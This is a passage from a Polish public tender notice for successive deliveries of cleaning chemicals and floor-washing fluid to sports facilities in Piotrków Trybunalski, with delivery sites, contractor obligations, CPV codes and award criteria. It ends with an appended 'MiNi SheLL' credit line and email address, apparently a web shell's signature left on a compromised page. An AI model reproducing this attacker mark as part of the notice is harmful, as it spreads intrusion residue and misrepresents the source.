5. Każdy z produktów winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 4. 
6. Podane w Kosztorysie Ofertowym Część 4 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 4, będącym załącznikiem Nr 2 do umowy, które są niezmienne przez cały okres obowiązywania umowy. 
7. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości produktów, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 4, określającym ilości produktów oraz ceny jednostkowe. 
8.  Dostawa, transport i rozładunek produktów do utrzymania czystości odbywać się będzie do obiektów Ośrodka Sportu i Rekreacji w Piotrkowie Trybunalskim:       
- Hala Relax Al. 3 Maja 6 B,       
- Centrum Rekreacyjno - Rehabilitacyjne ul. Belzacka 108/110,       
- Korty Ziemne ul. Belzacka 108/110,
- Kąpielisko Miejskie Słoneczko  - Bugaj,
- Kryta Pływalnia ul. Belzacka 106,      
- Kryta Pływalnia  ul. Próchnika 8/12,       
- Stadion Miejski ul. Żwirki 6,       
- Lodowisko Miejskie/Korty Tenisowe w Parku Miejskim ul. Żeromskiego 22,
- Boisko Sportowe ul. Broniewskiego 18      
na koszt i ryzyko Wykonawcy. 
9. Wykonawca zobowiązuje się dostarczyć produkty nowe, w oryginalnych opakowaniach, w pojemnikach przystosowanych do transportu i przechowywania chemikaliów,  z  etykietami  w  języku  polskim,  z  minimum  3  miesięcznym  okresem 
przydatności do zużycia od daty dostawy, posiadający świadectwo jakości producenta. 
10. Wykonawca zobowiązany jest posiadać w okresie realizacji umowy aktualne, wymagane prawem atesty higieniczne, pozwolenia czy instrukcje dopuszczające zaoferowane produkty do powszechnego użytku. 
11. Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych produktów.  
WYKONAWCA USŁUGI:  
1. dostarczy produkty, które winny  posiadać własności chemiczne  gwarantujące odpowiednią jakość i spełnianie obowiązujących norm,  
2. wraz z dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu złoży karty charakterystyki każdej substancji lub ich kopie potwierdzone przez Wykonawcę za zgodność z oryginałem, 
3. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
4. do każdorazowej dostawy  produktów Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
5. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 51.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw, potwierdzenia jakości dostarczanych środków do utrzymania czystości i wartości całości zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8, 33.76.00.00-5, 39.22.43.30-0, 39.22.43.40-3, 39.81.24.00-1, 33.71.19.00-6, 39.80.00.00-0, 39.83.10.00-6, 39.81.11.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Termin realizacji każdorazowej dostawy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> SUKCESYWNA DOSTAWA PŁYNU  DO   MYCIA NAWIERZCHNI  HALI  RELAX  OŚRODKA SPORTU  I REKREACJI W PIOTRKOWIE TRYBUNALSKIM..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Całkowite zapotrzebowanie na dostawę płynu do mycia nawierzchni hali Relax (zwany dalej płynem) Ośrodka Sportu i Rekreacji w Piotrkowie Trybunalskim przedstawia Kosztorys Ofertowy Część 5. 
2. Płyn winien charakteryzować  się wysoką jakością. 
3. Dostawę płynu należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy płynu nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
5. Płyn winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 5.
6. Podana w Kosztorysie Ofertowym Część 5 ilość jest wielkością maksymalną, założoną do zamówienia, dostawa płynu następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg ceny jednostkowej podanej w Kosztorysie Ofertowym Część 5, będącym załącznikiem Nr 2 do umowy, która jest niezmienna przez cały okres obowiązywania umowy. 
7. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości płynu, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 5, określającym ilość płynu oraz cenę jednostkową. 
8.  Dostawa, transport i rozładunek płynu odbywać się będzie, do obiektu Hala RELAX przy al. 3 Maja 6B w Piotrkowie Trybunalskim na koszt i ryzyko Wykonawcy. 
9. Wykonawca zobowiązuje się dostarczyć płyn nowy, w oryginalnych opakowaniach. 
10.  Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonego płynu.  
WYKONAWCA USŁUGI: 
1. dostarczy płyn odpowiedniej jakość i  spełniający obowiązujące normy,  
2. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
3. do każdorazowej dostawy  płynu  Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
4. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 9.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw,  potwierdzenia jakości dostarczanego płynu i wartości całości zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.13.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Termin realizacji każdorazowej dostawy - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com